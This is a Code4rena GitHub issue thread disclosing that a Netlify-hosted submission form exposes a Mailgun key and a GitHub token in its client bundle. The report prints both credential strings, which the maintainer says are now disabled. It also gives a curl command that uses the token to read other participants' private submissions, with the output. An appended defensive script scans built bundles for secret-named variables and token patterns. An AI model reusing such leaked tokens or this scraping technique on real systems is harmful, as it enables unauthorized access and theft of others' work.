Closed code423n4 closed 3 years ago
Keys are disabled and I'm working on mitigating this. These keys were set in netlify and createIssue.js
should be running as a lambda function... so I'm a bit concerned here about either my understanding of netlify's lambda function setup or netlify's security or both.
Told wardens to standby for a new process for submissions.
There are two problems:
src directory, netlify will go ahead and add your environment variables in plain text and deploy them as part of your site. :joy: Working on updates.
In the meantime, I have taken the form offline and instructed wardens to keep their own notes on vulnerabilities until the form is ready for submissions.
@werg @marginswapper @zscole This is now resolved. Or should be, at least!
Form is back online at https://c4-marginswap.netlify.app/
Email address
mail@gpersoon.com
Handle
gpersoon
Eth address
0x8e2A89fF2F45ed7f8C8506f846200D671e2f176f
Vulnerability details
The github token can be retrieved from the https://c4-marginswap.netlify.app/ website
Proof of concept
In the source of the website (createIssue.js) you can see github is directly accessed from the website. With Fiddler you can search for GITHUB and see: REACT_APP_MAILGUN_DOMAIN:"mg.code423n4.com", REACT_APP_MAILGUN_KEY:"a9763c0878cd90413bf11615456692e7-b6d086a8-be1c8bad", REACT_APP_GITHUB_TOKEN:"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"
With Fiddler you can search for code-423n4 and see: "owner":"code-423n4", "repo":"marginswap-results"
With the GITHUB token you can retrieve the issues: curl -H "Authorization: token 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" https://api.github.com/repos/code-423n4/marginswap-results/issues
This shows: "body": "# Email address\n\nadam@andyet.com\n\n\n# Handle\n\nadamavenir\n\n\n# Eth address\n\n123123123\n\n\n# Vulnerability details\n\nSome details:\n\n
\ndetails(schemtails)\n
\n\n\n# Impact\n\nBrace for it!\n\n\n# Proof of concept\n\n- proof\n- of \n- concept\n\n\n# Tools used\n\nI used no tools except this form and my BARE HANDS!\n\n\n# Recommended mitigation steps\n\nI would recommend not doing this bug.\n\n",
Impact
With the token you can access the submissions of others and share in their prizes.
Tools used
Fiddler (https://www.telerik.com/) and the developer console of Chrome to look at the source.
Recommended mitigation steps
Either open source the bug submission entirely, or split the bug submission application in two parts, where only a backend has the Github keys and does the creating of the issues.
There are tools that promise to do this, I haven't looked into them: https://fire.fundersclub.com/ https://zapier.com/apps/github/integrations/gmail/10314/create-github-issues-from-new-emails-on-gmail-business-gmail-accounts-only https://flow.microsoft.com/en-us/galleries/public/templates/6b590f10bc9011e6b2e2c98b01575bae/send-an-email-to-create-github-issues/
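Added example (my code, not part of the issue or of the C4 submission form): a pre-deploy check that scans a built client bundle for `REACT_APP_*` variables with secret-looking names and for GitHub token strings, i.e. the inlined `process.env` object that the proof of concept above found with Fiddler. The bundle text, variable names and token value in the sample are constructed; the file path in the usage comment is hypothetical.

```javascript
// Create React App inlines every REACT_APP_* variable into the client
// bundle at build time. This check fails a deploy when any such variable
// carries a secret-looking name, or when a GitHub PAT appears anywhere
// in the bundle, regardless of how it got there.
// Usage (hypothetical path): node check-bundle.js build/static/js/main.js

// Captures the variable name and its string value from a minified env object.
const SENSITIVE_ENV =
  /(REACT_APP_[A-Z0-9_]*?(?:TOKEN|KEY|SECRET|PASSWORD)[A-Z0-9_]*)\s*:\s*"([^"]*)"/g;
// Classic GitHub personal access tokens: "ghp_" followed by 36 alphanumerics.
const GITHUB_PAT = /\bghp_[A-Za-z0-9]{36}\b/g;

// Keep the report from re-leaking the value it is warning about.
function redact(value) {
  return value.length <= 8 ? '***' : value.slice(0, 4) + '...' + value.slice(-4);
}

// Returns findings as {kind, name, value}; each raw value is reported once,
// so a token found both as an env var and by pattern is not double counted.
function findLeakedSecrets(bundleText) {
  const findings = [];
  const seen = new Set();
  for (const m of bundleText.matchAll(SENSITIVE_ENV)) {
    seen.add(m[2]);
    findings.push({ kind: 'env', name: m[1], value: redact(m[2]) });
  }
  for (const m of bundleText.matchAll(GITHUB_PAT)) {
    if (seen.has(m[0])) continue;
    seen.add(m[0]);
    findings.push({ kind: 'github_pat', name: 'ghp_*', value: redact(m[0]) });
  }
  return findings;
}

// Constructed sample in the shape of the leaked object from the report;
// the key and token are dummy values, not real credentials.
const SAMPLE_BUNDLE =
  'var e={NODE_ENV:"production",REACT_APP_MAILGUN_DOMAIN:"mg.example.com",' +
  'REACT_APP_MAILGUN_KEY:"0123456789abcdef0123456789abcdef-deadbeef-cafef00d",' +
  'REACT_APP_GITHUB_TOKEN:"ghp_' + 'A'.repeat(36) + '"};';

console.log(findLeakedSecrets(SAMPLE_BUNDLE));
```

A non-secret `REACT_APP_*` value such as the Mailgun domain is still inlined but is not flagged; only the name filter and the token pattern decide what counts as a leak.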